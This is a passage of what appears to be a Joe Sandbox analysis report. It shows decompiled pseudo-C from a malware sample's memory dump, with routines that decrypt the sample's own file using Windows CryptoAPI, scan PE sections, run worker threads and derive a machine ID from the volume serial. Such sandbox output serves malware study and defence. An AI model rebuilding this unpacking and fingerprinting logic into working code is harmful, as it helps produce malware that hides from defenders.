                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                                          					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                                          					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                                          						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                                          						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                                          						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                                          						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                                          					E040097C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                                          					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L22:
                                                                                                                                                                                                                                                                                          				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                                          0x040040a5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040040ab
                                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x04004273
                                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x040042a2
                                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x040042cd
                                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                                          • Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04004510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                                          				void* _v784;
                                                                                                                                                                                                                                                                                          				char _v1308;
                                                                                                                                                                                                                                                                                          				long _v1312;
                                                                                                                                                                                                                                                                                          				void* _v1316;
                                                                                                                                                                                                                                                                                          				long _v1320;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1328;
                                                                                                                                                                                                                                                                                          				signed int _v1332;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1336;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1340;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1344;
                                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                                          				signed char _t101;
                                                                                                                                                                                                                                                                                          				signed char _t114;
                                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                                          					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                                          					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                          					_v784 = _t90;
                                                                                                                                                                                                                                                                                          					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                                          					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                                                                          						if(_v784 != 0) {
                                                                                                                                                                                                                                                                                          							CloseHandle(_v784);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v1316 = _t94;
                                                                                                                                                                                                                                                                                          					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v1320 = 0;
                                                                                                                                                                                                                                                                                          					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                                                                                          						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							_v1316 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                                          						_v784 = 0;
                                                                                                                                                                                                                                                                                          						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                                          						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                                          						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                          								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								_v1316 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                          							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                          							_v1332 = 0;
                                                                                                                                                                                                                                                                                          							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                          								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v1340 = _v1344;
                                                                                                                                                                                                                                                                                          								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                                          								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                                          								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v5 = 1;
                                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x0400451a
                                                                                                                                                                                                                                                                                          0x04004522
                                                                                                                                                                                                                                                                                          0x040047e6
                                                                                                                                                                                                                                                                                          0x040047ed
                                                                                                                                                                                                                                                                                          0x04004532
                                                                                                                                                                                                                                                                                          0x04004556
                                                                                                                                                                                                                                                                                          0x0400455b
                                                                                                                                                                                                                                                                                          0x0400456c
                                                                                                                                                                                                                                                                                          0x0400458b
                                                                                                                                                                                                                                                                                          0x04004591
                                                                                                                                                                                                                                                                                          0x0400459e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040045b3
                                                                                                                                                                                                                                                                                          0x040045c0
                                                                                                                                                                                                                                                                                          0x040047d0
                                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                                          0x040045d6
                                                                                                                                                                                                                                                                                          0x040045dc
                                                                                                                                                                                                                                                                                          0x040045e9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040045ef
                                                                                                                                                                                                                                                                                          0x04004617
                                                                                                                                                                                                                                                                                          0x0400461f
                                                                                                                                                                                                                                                                                          0x040047a9
                                                                                                                                                                                                                                                                                          0x040047b0
                                                                                                                                                                                                                                                                                          0x040047c0
                                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004637
                                                                                                                                                                                                                                                                                          0x0400463e
                                                                                                                                                                                                                                                                                          0x04004644
                                                                                                                                                                                                                                                                                          0x04004660
                                                                                                                                                                                                                                                                                          0x04004665
                                                                                                                                                                                                                                                                                          0x0400466d
                                                                                                                                                                                                                                                                                          0x0400467f
                                                                                                                                                                                                                                                                                          0x0400468f
                                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                                          0x040046a8
                                                                                                                                                                                                                                                                                          0x040046c2
                                                                                                                                                                                                                                                                                          0x040046c8
                                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                                          0x0400470f
                                                                                                                                                                                                                                                                                          0x0400473b
                                                                                                                                                                                                                                                                                          0x0400476b
                                                                                                                                                                                                                                                                                          0x0400473d
                                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                                          0x04004777
                                                                                                                                                                                                                                                                                          0x0400478f
                                                                                                                                                                                                                                                                                          0x04004794
                                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                                          0x040046dd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                                          0x0400461f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                                          • Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                          			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                                                                                                                          				long _v408;
                                                                                                                                                                                                                                                                                          				char _v673;
                                                                                                                                                                                                                                                                                          				char _v676;
                                                                                                                                                                                                                                                                                          				intOrPtr _v680;
                                                                                                                                                                                                                                                                                          				long _v684;
                                                                                                                                                                                                                                                                                          				signed int _v688;
                                                                                                                                                                                                                                                                                          				short* _v692;
                                                                                                                                                                                                                                                                                          				signed int _v696;
                                                                                                                                                                                                                                                                                          				unsigned int _v700;
                                                                                                                                                                                                                                                                                          				intOrPtr _v704;
                                                                                                                                                                                                                                                                                          				char _v900;
                                                                                                                                                                                                                                                                                          				signed int _v904;
                                                                                                                                                                                                                                                                                          				signed int _v908;
                                                                                                                                                                                                                                                                                          				int _v912;
                                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          				short** _t76;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x20;
                                                                                                                                                                                                                                                                                          					_v24 = 6;
                                                                                                                                                                                                                                                                                          					_v684 = 0;
                                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                                          					_v408 = 0;
                                                                                                                                                                                                                                                                                          					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                                          					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                                          					_v680 = _a4;
                                                                                                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                                          						_v673 = 0;
                                                                                                                                                                                                                                                                                          						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                                                                                                                                                                          							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                                          							E04007D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                                          							_v700 = 0;
                                                                                                                                                                                                                                                                                          							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                                          							if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          								_v904 = 0;
                                                                                                                                                                                                                                                                                          								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                                          									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                                          									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v696 = _v684;
                                                                                                                                                                                                                                                                                          							_v908 = 0;
                                                                                                                                                                                                                                                                                          							while(_v908 < 4) {
                                                                                                                                                                                                                                                                                          								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                                          								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                                          								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t76 =  &_v692;
                                                                                                                                                                                                                                                                                          							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                                          							_v704 = _t76;
                                                                                                                                                                                                                                                                                          							if(_v704 >= 0) {
